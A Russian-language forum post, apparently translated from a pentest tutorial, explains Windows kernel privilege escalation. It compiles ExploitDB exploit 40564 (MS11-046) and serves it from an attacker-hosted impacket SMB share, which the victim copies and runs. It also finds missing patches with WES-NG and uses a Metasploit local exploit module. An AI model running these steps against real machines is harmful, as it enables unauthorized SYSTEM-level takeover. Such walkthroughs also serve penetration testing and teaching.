• XSS.stack #1 – первый литературный журнал от юзеров форума

Статья Повышение привилегий Windows: эксплойт ядра

yashechka

Генератор контента.Фанат Ильфака и Рикардо Нарвахи
Эксперт
Регистрация
24.11.2012
Сообщения
2 344
Реакции
3 563
Поскольку наша серия была посвящена повышению привилегий Windows, я пишу эту статью, чтобы объяснить использование команд для эксплуатации в режиме ядра.

Что такое ядро?

Ядро — это компьютерная программа, которая служит ядром или сердцем операционной системы. Оно управляет памятью, задачами и дисками.

1641748310694.png


Операционная система имеет следующие разделенные пространства:

- Пространство ядра: ядро обычно поддерживается и загружается в отдельную область памяти, называемую защищенным пространством ядра. Оно защищен от доступа со стороны прикладных программ или менее важных компонентов операционной системы.

- Пользовательское пространство: операционная система (ОС) — это программное обеспечение, которое действует как мост между аппаратными компонентами и конечным пользователем. Память пользовательского пространства используется прикладными программами, такими как браузер, текстовый процессор и аудио- и видеоплеер.

Методы повышения привилегий ядра

В ядре Windows на удаленном узле существует уязвимость повышения привилегий. В случае успешной эксплуатации локальный авторизованный злоумышленник может запустить специально созданную программу режима ядра и получить контроль над машиной.

Тактика: Повышение привилегий

Платформа: Windows

Требования

Целевая машина
: Windows 10

ПК злоумышленника: Kali Linux

Условие: скомпрометируйте целевую машину с доступом с низкими привилегиями, используя Metasploit, Netcat и т. д.

Цель: повысить привилегии до NT Authority/YSTEM для пользователя с низкими привилегиями, эксплатируя ядро.

Охота на уязвимое ядро

Злоумышленник всегда будет искать возможность повышения привилегий, если получить список уязвимостнй ядра. Это может быть возможно путем внедрения скрипта python или PowerShell. Он получает списокна на основе номера сборки и может возвращать идентификатор CVE, чтобы легко эксплатировать машину и получить доступа дминистратора.

1641748352131.png


Эксплойт ядра с использованием ExploitDB

Когда у злоумышленника есть реверс соединение, он может получить номер сборки ядра, как показано на изображении ниже.

1641748366782.png


Это поможет ему обнаружить связанный эксплойт, если оно уязвимо.

1641748374680.png


Для этой версии ядра мы обнаружили уязвимость MS11-046 (CVE: 2011-1249).

1641748387547.png


То же самое можно получить с помощью searchsploit, который также считается автономной версией ExploitDB. Как показано ниже, мы можем загрузить тот же эксплойт из его автономной версии.

searchsploit 40564
i686-w64-mingw32-gcc 40564.c –o 40564.exe –lws2_32

1641748400773.png


Давайте запустим службу SMB Share в новом терминале с помощью скрипта impacket python, как показано ниже:

impacket-smbserver share $(pwd)

1641748414868.png


Это поможет нам импортировать эксплойт внутрь скомпрометированных оболочек с помощью команды копирования:

copy \\192.168.1.3\share\40564.exe

Как только эксплойт будет загружен, мы можем запустить эту программу, чтобы получить привилегированную оболочку с правами NT Authority/system.

1641748430702.png


Эксплойт ядра с помощью Metasploit

После того, как вы получите версию ядра, вы можете использовать Google, чтобы получить доступный эксплойт, тогда как вы можете загрузить Windows Exploit Suggester — Next Generation (WES-NG) в свой kali Linux, который будет искать доступный эксплойт для полученного ядра. Вы можете скачать этот скрипт из библиотеки Github.

git clone https://github.com/bitsadmin/wesng
cd wesng


Примечание. Существует два варианта проверки отсутствующих исправлений: a. Запустите missingkbs.vbs, чтобы Windows определила, каких исправлений не хватает b. Используйте встроенный в Windows инструмент systeminfo.exe для получения системной информации локальной системы или из удаленной системы с помощью systeminfo /S MyRemoteHost и перенаправьте ее в файл: systeminfo > systeminfo.txt

1641748465422.png


Поскольку мы сохранили вывод systeminfo в текстовом файле и назвали его systeminfo.txt. Далее мы используем эту информацию для запуска скрипта wes.py

python wes.py /root/systeminfo.txt

1641748480492.png


В результате он попытается определить отсутствующие исправления и сообщить об имеющихся уязвимостях и риск. На приведенном ниже изображении вы можете заметить, что у него есть указанная ссылка для эксплойта, доступная в базе данных эксплойтов.

1641748488868.png


На этот раз мы будем использовать Metasploit для пост-эксплуатации и искать привилегированную оболочку с привилегиями NT Authority.

use exploit/windows/local/ms16_014_wmi_rec_notif
set session 1
exploit


При успешном выполнении Metasploit предоставит оболочку с административными привилегиями.

1641748506697.png


Переведено специально для xss.pro
Автор перевода: yashechka
Источник: https://www.hackingarticles.in/windows-privilege-escalation-kernel-exploit/
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх